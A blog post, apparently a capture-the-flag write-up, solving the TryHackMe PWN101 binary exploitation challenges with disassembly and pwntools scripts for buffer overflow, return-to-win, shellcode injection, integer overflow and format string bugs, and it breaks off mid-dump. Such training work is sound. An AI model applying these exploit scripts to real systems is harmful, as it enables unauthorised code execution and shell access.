{"id":708,"date":"2025-03-19T15:35:00","date_gmt":"2025-03-19T07:35:00","guid":{"rendered":"https:\/\/chengyunpu.com\/wordpress\/?p=708"},"modified":"2026-03-24T16:39:38","modified_gmt":"2026-03-24T08:39:38","slug":"tryhackme-pwn101","status":"publish","type":"post","link":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/","title":{"rendered":"TryHackMe PWN101"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li>Buffer overflow<\/li>\n\n\n\n<li>Modify variable&#8217;s value<\/li>\n\n\n\n<li>Return to win<\/li>\n\n\n\n<li>Return to shellcode<\/li>\n\n\n\n<li>Integer Overflow<\/li>\n\n\n\n<li>Format string exploit<\/li>\n\n\n\n<li>Bypassing mitigations<\/li>\n\n\n\n<li>GOT overwrite<\/li>\n\n\n\n<li>Return to PLT<\/li>\n\n\n\n<li>Playing with ROP<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 101 &#8211; Buffer overflow<\/h2>\n\n\n\n<p>No stack canary. From the disassembly, rbp-0x4 holds 0x539; when the value at rbp-0x4 is no longer 0x539, the program calls system(&#8216;\/bin\/sh&#8217;), giving RCE. Filling the buffer at rbp-0x40 via gets overwrites rbp-0x4 along the way, which is enough to get a shell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x000000000000088e &lt;+0&gt;:     push   rbp\n   0x000000000000088f &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000000892 &lt;+4&gt;:     sub    rsp,0x40\n   0x0000000000000896 &lt;+8&gt;:     mov    DWORD PTR [rbp-0x4],0x539\n   0x000000000000089d &lt;+15&gt;:    mov    eax,0x0\n   0x00000000000008a2 &lt;+20&gt;:    call   0x81a &lt;setup&gt;\n   0x00000000000008a7 &lt;+25&gt;:    mov    eax,0x0\n   0x00000000000008ac &lt;+30&gt;:    call   0x87b &lt;banner&gt;\n   0x00000000000008b1 &lt;+35&gt;:    lea    rdi,[rip+0x208]        # 0xac0\n   0x00000000000008b8 &lt;+42&gt;:    call   0x6b0 &lt;puts@plt&gt;\n   
0x00000000000008bd &lt;+47&gt;:    lea    rdi,[rip+0x2dc]        # 0xba0\n   0x00000000000008c4 &lt;+54&gt;:    call   0x6b0 &lt;puts@plt&gt;\n   0x00000000000008c9 &lt;+59&gt;:    lea    rax,[rbp-0x40]\n   0x00000000000008cd &lt;+63&gt;:    mov    rdi,rax\n   0x00000000000008d0 &lt;+66&gt;:    mov    eax,0x0\n   0x00000000000008d5 &lt;+71&gt;:    call   0x6d0 &lt;gets@plt&gt;\n   0x00000000000008da &lt;+76&gt;:    cmp    DWORD PTR [rbp-0x4],0x539\n   0x00000000000008e1 &lt;+83&gt;:    jne    0x8f9 &lt;main+107&gt;\n   0x00000000000008e3 &lt;+85&gt;:    lea    rdi,[rip+0x2e6]        # 0xbd0\n   0x00000000000008ea &lt;+92&gt;:    call   0x6b0 &lt;puts@plt&gt;\n   0x00000000000008ef &lt;+97&gt;:    mov    edi,0x539\n   0x00000000000008f4 &lt;+102&gt;:   call   0x6f0 &lt;exit@plt&gt;\n   0x00000000000008f9 &lt;+107&gt;:   lea    rdi,[rip+0x318]        # 0xc18\n   0x0000000000000900 &lt;+114&gt;:   call   0x6b0 &lt;puts@plt&gt;\n   0x0000000000000905 &lt;+119&gt;:   lea    rdi,[rip+0x333]        # 0xc3f\n   0x000000000000090c &lt;+126&gt;:   call   0x6c0 &lt;system@plt&gt;\n   0x0000000000000911 &lt;+131&gt;:   nop\n   0x0000000000000912 &lt;+132&gt;:   leave\n   0x0000000000000913 &lt;+133&gt;:   ret\nEnd of assembler dump.\npwndbg&gt; x\/s 0xc3f\n0xc3f:  \"\/bin\/sh\"<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nip='10.10.101.156'\nport=9001\nr=remote(ip,port)\n\nr.sendline(b'a'*0x40)\nr.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 102 &#8211; Modify variable&#8217;s value<\/h2>\n\n\n\n<p>Initially rbp-0x4 holds 0xbadf00d and rbp-0x8 holds 0xfee1dead. The scanf input is stored starting at rbp-0x70, and the if check gives a shell once rbp-0x4 becomes 0xc0ff33 and rbp-0x8 becomes 0xc0d3. Padding upward from rbp-0x70 reaches rbp-0x8 first, so send 0xc0d3 before 0xc0ff33; both values occupy 4 bytes, so they are sent with p32().<\/p>
\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x00000000000008fe &lt;+0&gt;:     push   rbp\n   0x00000000000008ff &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000000902 &lt;+4&gt;:     sub    rsp,0x70\n   0x0000000000000906 &lt;+8&gt;:     mov    eax,0x0\n   0x000000000000090b &lt;+13&gt;:    call   0x88a &lt;setup&gt;\n   0x0000000000000910 &lt;+18&gt;:    mov    eax,0x0\n   0x0000000000000915 &lt;+23&gt;:    call   0x8eb &lt;banner&gt;\n   0x000000000000091a &lt;+28&gt;:    mov    DWORD PTR [rbp-0x4],0xbadf00d\n   0x0000000000000921 &lt;+35&gt;:    mov    DWORD PTR [rbp-0x8],0xfee1dead\n   0x0000000000000928 &lt;+42&gt;:    mov    edx,DWORD PTR [rbp-0x8]\n   0x000000000000092b &lt;+45&gt;:    mov    eax,DWORD PTR [rbp-0x4]\n   0x000000000000092e &lt;+48&gt;:    mov    esi,eax\n   0x0000000000000930 &lt;+50&gt;:    lea    rdi,[rip+0x212]        # 0xb49\n   0x0000000000000937 &lt;+57&gt;:    mov    eax,0x0\n   0x000000000000093c &lt;+62&gt;:    call   0x730 &lt;printf@plt&gt;\n   0x0000000000000941 &lt;+67&gt;:    lea    rax,[rbp-0x70]\n   0x0000000000000945 &lt;+71&gt;:    mov    rsi,rax\n   0x0000000000000948 &lt;+74&gt;:    lea    rdi,[rip+0x217]        # 0xb66\n   0x000000000000094f &lt;+81&gt;:    mov    eax,0x0\n   0x0000000000000954 &lt;+86&gt;:    call   0x750 &lt;__isoc99_scanf@plt&gt;\n   0x0000000000000959 &lt;+91&gt;:    cmp    DWORD PTR [rbp-0x4],0xc0ff33\n   0x0000000000000960 &lt;+98&gt;:    jne    0x992 &lt;main+148&gt;\n   0x0000000000000962 &lt;+100&gt;:   cmp    DWORD PTR [rbp-0x8],0xc0d3\n   0x0000000000000969 &lt;+107&gt;:   jne    0x992 &lt;main+148&gt;\n   0x000000000000096b &lt;+109&gt;:   mov    edx,DWORD PTR [rbp-0x8]\n   0x000000000000096e &lt;+112&gt;:   mov    eax,DWORD PTR [rbp-0x4]\n   0x0000000000000971 &lt;+115&gt;:   mov    esi,eax\n   0x0000000000000973 &lt;+117&gt;:   lea    rdi,[rip+0x1ef]        # 0xb69\n   0x000000000000097a &lt;+124&gt;:   mov    eax,0x0\n   0x000000000000097f &lt;+129&gt;:   call   0x730 &lt;printf@plt&gt;\n   0x0000000000000984 &lt;+134&gt;:   lea    rdi,[rip+0x1f4]        # 0xb7f\n   0x000000000000098b &lt;+141&gt;:   call   0x720 &lt;system@plt&gt;\n   0x0000000000000990 &lt;+146&gt;:   jmp    0x9a8 &lt;main+170&gt;\n   0x0000000000000992 &lt;+148&gt;:   lea    rdi,[rip+0x1ef]        # 0xb88\n   0x0000000000000999 &lt;+155&gt;:   call   0x710 &lt;puts@plt&gt;\n   0x000000000000099e &lt;+160&gt;:   mov    edi,0x539\n   0x00000000000009a3 &lt;+165&gt;:   call   0x760 &lt;exit@plt&gt;\n   0x00000000000009a8 &lt;+170&gt;:   leave\n   0x00000000000009a9 &lt;+171&gt;:   ret\nEnd of assembler dump.\npwndbg&gt; x\/s 0xb7f\n0xb7f:  \"\/bin\/sh\"<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nip='10.10.101.156'\nport=9002\nr=remote(ip,port)\n\nr.sendline(b'a'*104 + p32(0xc0d3) + p32(0xc0ff33))\nr.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 103 &#8211; Return to win<\/h2>\n\n\n\n<p>Running it directly looks like this<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/pwn]\n\u2514\u2500$ .\/pwn103-1644300337872.pwn103 \n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u285f\u2801\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2808\u28b9\u28ff\u28ff\u28ff                                                                                                     
\n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2804\u28a0\u28f4\u28fe\u28f5\u28f6\u28f6\u28fe\u28ff\u28e6\u2844\u2804\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2880\u28fe\u28ff\u28ff\u28bf\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2844\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u28b8\u28ff\u28ff\u28e7\u28c0\u28fc\u28ff\u28c4\u28e0\u28ff\u28ff\u28ff\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2818\u283b\u28b7\u286f\u281b\u281b\u281b\u281b\u28ab\u28ff\u281f\u281b\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u28e7\u2840\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u28a1\u28c0\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f6\u28c6\u28f8\u28ff\u28ff\u28ff                                                                                                     
\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff                                                                                                     \n                                                                                                                             \n  [THM Discord Server]                                                                                                       \n\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n1) \ud83d\udce2 Announcements\n2) \ud83d\udcdc Rules\n3) \ud83d\udde3  General\n4) \ud83c\udfe0 rooms discussion\n5) \ud83e\udd16 Bot commands\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\u2328  Choose the channel: <\/code><\/pre>\n\n\n\n<p>In the general function behind option 3, the input read by scanf ahead of the strcmp can overflow: the value is stored at rbp-0x20, so those 0x20 bytes plus the 8 bytes of saved rbp make up the padding<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble general\nDump of assembler code for function general:\n   0x00000000004012be &lt;+0&gt;:     push   rbp\n   0x00000000004012bf &lt;+1&gt;:     mov    rbp,rsp\n   0x00000000004012c2 &lt;+4&gt;:     sub    rsp,0x20\n   0x00000000004012c6 &lt;+8&gt;:     lea    rax,[rip+0x10dd]        # 0x4023aa\n   0x00000000004012cd &lt;+15&gt;:    mov    rdi,rax\n   0x00000000004012d0 &lt;+18&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x00000000004012d5 &lt;+23&gt;:    lea    rax,[rip+0x10e4]        # 0x4023c0\n   0x00000000004012dc &lt;+30&gt;:    mov    rdi,rax\n   0x00000000004012df &lt;+33&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x00000000004012e4 &lt;+38&gt;:    lea    rax,[rip+0x10fd]        # 0x4023e8\n   0x00000000004012eb &lt;+45&gt;:    mov    rdi,rax\n   0x00000000004012ee &lt;+48&gt;:    call   0x401040 &lt;puts@plt&gt;\n  
 0x00000000004012f3 &lt;+53&gt;:    lea    rax,[rip+0x111e]        # 0x402418\n   0x00000000004012fa &lt;+60&gt;:    mov    rdi,rax\n   0x00000000004012fd &lt;+63&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x0000000000401302 &lt;+68&gt;:    lea    rax,[rip+0x1143]        # 0x40244c\n   0x0000000000401309 &lt;+75&gt;:    mov    rdi,rax\n   0x000000000040130c &lt;+78&gt;:    mov    eax,0x0\n   0x0000000000401311 &lt;+83&gt;:    call   0x401060 &lt;printf@plt&gt;\n   0x0000000000401316 &lt;+88&gt;:    lea    rax,[rbp-0x20]\n   0x000000000040131a &lt;+92&gt;:    mov    rsi,rax\n   0x000000000040131d &lt;+95&gt;:    lea    rax,[rip+0x1138]        # 0x40245c\n   0x0000000000401324 &lt;+102&gt;:   mov    rdi,rax\n   0x0000000000401327 &lt;+105&gt;:   mov    eax,0x0\n   0x000000000040132c &lt;+110&gt;:   call   0x4010a0 &lt;__isoc99_scanf@plt&gt;\n   0x0000000000401331 &lt;+115&gt;:   lea    rax,[rbp-0x20]\n   0x0000000000401335 &lt;+119&gt;:   lea    rdx,[rip+0x1123]        # 0x40245f\n   0x000000000040133c &lt;+126&gt;:   mov    rsi,rdx\n   0x000000000040133f &lt;+129&gt;:   mov    rdi,rax\n   0x0000000000401342 &lt;+132&gt;:   call   0x401080 &lt;strcmp@plt&gt;\n   0x0000000000401347 &lt;+137&gt;:   test   eax,eax\n   0x0000000000401349 &lt;+139&gt;:   jne    0x401366 &lt;general+168&gt;\n   0x000000000040134b &lt;+141&gt;:   lea    rax,[rip+0x1111]        # 0x402463\n   0x0000000000401352 &lt;+148&gt;:   mov    rdi,rax\n   0x0000000000401355 &lt;+151&gt;:   call   0x401040 &lt;puts@plt&gt;\n   0x000000000040135a &lt;+156&gt;:   mov    eax,0x0\n   0x000000000040135f &lt;+161&gt;:   call   0x40158c &lt;main&gt;\n   0x0000000000401364 &lt;+166&gt;:   jmp    0x401375 &lt;general+183&gt;\n   0x0000000000401366 &lt;+168&gt;:   lea    rax,[rip+0x1112]        # 0x40247f\n   0x000000000040136d &lt;+175&gt;:   mov    rdi,rax\n   0x0000000000401370 &lt;+178&gt;:   call   0x401040 &lt;puts@plt&gt;\n   0x0000000000401375 &lt;+183&gt;:   nop\n   0x0000000000401376 &lt;+184&gt;:   
leave\n   0x0000000000401377 &lt;+185&gt;:   ret<\/code><\/pre>\n\n\n\n<p>This ELF has an admins_only function that gives RCE; once the padding is in place, overwrite the saved return address with this function&#8217;s address<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble admins_only\nDump of assembler code for function admins_only:\n   0x0000000000401554 &lt;+0&gt;:     push   rbp\n   0x0000000000401555 &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000401558 &lt;+4&gt;:     sub    rsp,0x10\n   0x000000000040155c &lt;+8&gt;:     lea    rax,[rip+0x1d04]        # 0x403267\n   0x0000000000401563 &lt;+15&gt;:    mov    rdi,rax\n   0x0000000000401566 &lt;+18&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x000000000040156b &lt;+23&gt;:    lea    rax,[rip+0x1d0a]        # 0x40327c\n   0x0000000000401572 &lt;+30&gt;:    mov    rdi,rax\n   0x0000000000401575 &lt;+33&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x000000000040157a &lt;+38&gt;:    lea    rax,[rip+0x1d0e]        # 0x40328f\n   0x0000000000401581 &lt;+45&gt;:    mov    rdi,rax\n   0x0000000000401584 &lt;+48&gt;:    call   0x401050 &lt;system@plt&gt;\n   0x0000000000401589 &lt;+53&gt;:    nop\n   0x000000000040158a &lt;+54&gt;:    leave\n   0x000000000040158b &lt;+55&gt;:    ret\nEnd of assembler dump.\npwndbg&gt; x\/s 0x40328f\n0x40328f:       \"\/bin\/sh\"<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n#r=process('.\/pwn103-1644300337872.pwn103')\nip='10.10.100.188'\nport=9003\nr=remote(ip,port)\n\nr.sendline(b'3')\nr.sendline(b'a'*0x28 + p64(0x401555))\nr.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 104 &#8211; Return to shellcode<\/h2>\n\n\n\n<p>A challenge with every protection disabled. From the disassembly the offset is 80 (rbp-0x50) + 8 (rbp): place the shellcode first, then set the return address to the location where the shellcode sits<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x00000000004011cd &lt;+0&gt;:     push   rbp\n   0x00000000004011ce &lt;+1&gt;:     mov    rbp,rsp\n   0x00000000004011d1 &lt;+4&gt;:     sub    rsp,0x50\n   0x00000000004011d5 &lt;+8&gt;:     mov    eax,0x0\n   0x00000000004011da &lt;+13&gt;:    call   0x401156 &lt;setup&gt;\n   0x00000000004011df &lt;+18&gt;:    mov    eax,0x0\n   0x00000000004011e4 &lt;+23&gt;:    call   0x4011b7 &lt;banner&gt;\n   0x00000000004011e9 &lt;+28&gt;:    lea    rax,[rip+0xf30]        # 0x402120\n   0x00000000004011f0 &lt;+35&gt;:    mov    rdi,rax\n   0x00000000004011f3 &lt;+38&gt;:    call   0x401030 &lt;puts@plt&gt;\n   0x00000000004011f8 &lt;+43&gt;:    lea    rax,[rip+0xf49]        # 0x402148\n   0x00000000004011ff &lt;+50&gt;:    mov    rdi,rax\n   0x0000000000401202 &lt;+53&gt;:    call   0x401030 &lt;puts@plt&gt;\n   0x0000000000401207 &lt;+58&gt;:    lea    rax,[rip+0xf62]        # 0x402170\n   0x000000000040120e &lt;+65&gt;:    mov    rdi,rax\n   0x0000000000401211 &lt;+68&gt;:    call   0x401030 &lt;puts@plt&gt;\n   0x0000000000401216 &lt;+73&gt;:    lea    rax,[rbp-0x50]\n   0x000000000040121a &lt;+77&gt;:    mov    rsi,rax\n   0x000000000040121d &lt;+80&gt;:    lea    rax,[rip+0xf6c]        # 0x402190\n   0x0000000000401224 &lt;+87&gt;:    mov    rdi,rax\n   0x0000000000401227 &lt;+90&gt;:    mov    eax,0x0\n   0x000000000040122c &lt;+95&gt;:    call   0x401040 &lt;printf@plt&gt;\n   0x0000000000401231 &lt;+100&gt;:   lea    rax,[rbp-0x50]\n   0x0000000000401235 &lt;+104&gt;:   mov    edx,0xc8\n   0x000000000040123a &lt;+109&gt;:   mov    rsi,rax\n   0x000000000040123d &lt;+112&gt;:   mov    edi,0x0\n   0x0000000000401242 &lt;+117&gt;:   mov    eax,0x0\n   0x0000000000401247 &lt;+122&gt;:   call   0x401050 &lt;read@plt&gt;\n   0x000000000040124c &lt;+127&gt;:   nop\n   0x000000000040124d &lt;+128&gt;:   leave\n=&gt; 0x000000000040124e &lt;+129&gt;:   ret<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\ncontext.arch = 'amd64'\nio=process('.\/pwn104-1644300377109.pwn104')\nio.recvlines(9)\n\nio.recvuntil(b\"I'm waiting for you at \")\naddr=int(io.recv().strip(),16)\n\nshellcode = asm(shellcraft.sh())\n\nio.send(shellcode.ljust(88,b'a')+p64(addr))\nio.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 105 &#8211; Integer Overflow<\/h2>\n\n\n\n<p>IDA decompilation:<\/p>\n\n\n\n<p>To have a chance of reaching \/bin\/sh, the check (v5 &amp; 0x80000000) != 0 || (v6 &amp; 0x80000000) != 0 must be passed, i.e. both v5 and v6 must be below 0x80000000, which means at most C&#8217;s maximum int value 2147483647; but v5+v6, i.e. v7, must be at least 0x80000000 so that (v7 &amp; 0x80000000) != 0 holds<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"c\" class=\"language-c\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  unsigned int v5; \/\/ [rsp+Ch] [rbp-14h] BYREF\n  unsigned int v6; \/\/ [rsp+10h] [rbp-10h] BYREF\n  unsigned int v7; \/\/ [rsp+14h] [rbp-Ch]\n  unsigned __int64 v8; \/\/ [rsp+18h] [rbp-8h]\n\n  v8 = __readfsqword(0x28u);\n  setup(argc, argv, envp);\n  banner();\n  puts(\"-------=[ BAD INTEGERS ]=-------\");\n  puts(\"|-&lt; Enter two numbers to add &gt;-|\\n\");\n  printf(\"]&gt;&gt; \");\n  __isoc99_scanf(\"%d\", &amp;v5);\n  printf(\"]&gt;&gt; \");\n  __isoc99_scanf(\"%d\", &amp;v6);\n  v7 = v5 + v6;\n  if ( (v5 &amp; 0x80000000) != 0 || (v6 &amp; 0x80000000) != 0 )\n  {\n    printf(\"\\n[o.O] Hmmm... that was a Good try!\\n\");\n  }\n  else if ( (v7 &amp; 0x80000000) != 0 )\n  {\n    printf(\"\\n[*] C: %d\", v7);\n    puts(\"\\n[*] Popped Shell\\n[*] Switching to interactive mode\");\n    system(\"\/bin\/sh\");\n  }\n  else\n  {\n    printf(\"\\n[*] ADDING %d + %d\", v5, v6);\n    printf(\"\\n[*] RESULT: %d\\n\", v7);\n  }\n  return v8 - __readfsqword(0x28u);\n}<\/code><\/pre>\n\n\n\n<p>Enter 2147483647 for v5 and 1 for v6 so that v5+v6 (v7) exceeds the maximum int value<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nip='10.10.12.233'\nport=9005\nr=remote(ip,port)\n\nr.recvlines(9)\nr.sendlineafter(']&gt;&gt;',b'2147483647')\nr.sendlineafter(']&gt;&gt;',b'1')\nr.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 106 &#8211; Format string exploit<\/h2>\n\n\n\n<p>There is a format string vulnerability at the printf() call<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x000000000000123e &lt;+0&gt;:     push   rbp\n   0x000000000000123f &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000001242 &lt;+4&gt;:     sub    rsp,0x60\n   0x0000000000001246 &lt;+8&gt;:     mov    rax,QWORD PTR fs:0x28\n   0x000000000000124f &lt;+17&gt;:    mov    QWORD PTR [rbp-0x8],rax\n   0x0000000000001253 &lt;+21&gt;:    xor    eax,eax\n   0x0000000000001255 &lt;+23&gt;:    mov    eax,0x0\n   0x000000000000125a &lt;+28&gt;:    call   0x1179 &lt;setup&gt;\n   0x000000000000125f &lt;+33&gt;:    mov    eax,0x0\n   0x0000000000001264 &lt;+38&gt;:    call   0x1201 &lt;banner&gt;\n   0x0000000000001269 &lt;+43&gt;:    movabs rax,0x5b5858587b4d4854\n   0x0000000000001273 &lt;+53&gt;:    movabs rdx,0x6465725f67616c66\n   0x000000000000127d &lt;+63&gt;:    mov    QWORD PTR [rbp-0x60],rax\n   0x0000000000001281 &lt;+67&gt;:    mov    QWORD PTR [rbp-0x58],rdx\n   
0x0000000000001285 &lt;+71&gt;:    movabs rax,0x58585d6465746361\n   0x000000000000128f &lt;+81&gt;:    mov    QWORD PTR [rbp-0x50],rax\n   0x0000000000001293 &lt;+85&gt;:    mov    WORD PTR [rbp-0x48],0x7d58\n   0x0000000000001299 &lt;+91&gt;:    mov    BYTE PTR [rbp-0x46],0x0\n   0x000000000000129d &lt;+95&gt;:    lea    rax,[rip+0xe75]        # 0x2119\n   0x00000000000012a4 &lt;+102&gt;:   mov    rdi,rax\n   0x00000000000012a7 &lt;+105&gt;:   call   0x1030 &lt;puts@plt&gt;\n   0x00000000000012ac &lt;+110&gt;:   lea    rax,[rip+0xe85]        # 0x2138\n   0x00000000000012b3 &lt;+117&gt;:   mov    rdi,rax\n   0x00000000000012b6 &lt;+120&gt;:   mov    eax,0x0\n   0x00000000000012bb &lt;+125&gt;:   call   0x1050 &lt;printf@plt&gt;\n   0x00000000000012c0 &lt;+130&gt;:   lea    rax,[rbp-0x40]\n   0x00000000000012c4 &lt;+134&gt;:   mov    edx,0x32\n   0x00000000000012c9 &lt;+139&gt;:   mov    rsi,rax\n   0x00000000000012cc &lt;+142&gt;:   mov    edi,0x0\n   0x00000000000012d1 &lt;+147&gt;:   mov    eax,0x0\n   0x00000000000012d6 &lt;+152&gt;:   call   0x1060 &lt;read@plt&gt;\n   0x00000000000012db &lt;+157&gt;:   lea    rax,[rip+0xe8f]        # 0x2171\n   0x00000000000012e2 &lt;+164&gt;:   mov    rdi,rax\n   0x00000000000012e5 &lt;+167&gt;:   mov    eax,0x0\n   0x00000000000012ea &lt;+172&gt;:   call   0x1050 &lt;printf@plt&gt;\n   0x00000000000012ef &lt;+177&gt;:   lea    rax,[rbp-0x40]\n   0x00000000000012f3 &lt;+181&gt;:   mov    rdi,rax\n   0x00000000000012f6 &lt;+184&gt;:   mov    eax,0x0\n   0x00000000000012fb &lt;+189&gt;:   call   0x1050 &lt;printf@plt&gt;\n   0x0000000000001300 &lt;+194&gt;:   nop\n   0x0000000000001301 &lt;+195&gt;:   mov    rax,QWORD PTR [rbp-0x8]\n   0x0000000000001305 &lt;+199&gt;:   sub    rax,QWORD PTR fs:0x28\n   0x000000000000130e &lt;+208&gt;:   je     0x1315 &lt;main+215&gt;\n   0x0000000000001310 &lt;+210&gt;:   call   0x1040 &lt;__stack_chk_fail@plt&gt;\n   0x0000000000001315 &lt;+215&gt;:   leave\n   0x0000000000001316 
&lt;+216&gt;:   ret<\/code><\/pre>\n\n\n\n<p>Verify with pwndbg that the flag is present on the stack<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; r\nStarting program: \/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\/lib\/x86_64-linux-gnu\/libthread_db.so.1\".\n\nBreakpoint 1, 0x0000555555555242 in main ()\nLEGEND: STACK | HEAP | CODE | DATA | WX | RODATA\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ REGISTERS \/ show-flags off \/ show-compact-regs off ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n RAX  0x55555555523e (main) \u25c2\u2014 push rbp\n RBX  0x7fffffffde58 \u2014\u25b8 0x7fffffffe1c6 \u25c2\u2014 '\/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user'\n RCX  0x7ffff7f95680 (__exit_funcs) \u2014\u25b8 0x7ffff7f97000 (initial) \u25c2\u2014 0\n RDX  0x7fffffffde68 \u2014\u25b8 0x7fffffffe1fb \u25c2\u2014 'COLORFGBG=15;0'\n RDI  1\n RSI  0x7fffffffde58 \u2014\u25b8 0x7fffffffe1c6 \u25c2\u2014 '\/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user'\n R8   0x555555555380 (__libc_csu_fini) \u25c2\u2014 ret \n R9   0x7ffff7fcbc80 (_dl_fini) \u25c2\u2014 push rbp\n R10  0x7fffffffda80 \u25c2\u2014 0x800000\n R11  0x206\n R12  0\n R13  0x7fffffffde68 \u2014\u25b8 0x7fffffffe1fb \u25c2\u2014 'COLORFGBG=15;0'\n R14  0x7ffff7ffd000 (_rtld_global) \u2014\u25b8 0x7ffff7ffe310 \u2014\u25b8 0x555555554000 \u25c2\u2014 0x10102464c457f\n R15  0\n RBP  0x7fffffffdd40 \u25c2\u2014 1\n RSP  0x7fffffffdd40 \u25c2\u2014 1\n RIP  0x555555555242 (main+4) \u25c2\u2014 sub rsp, 
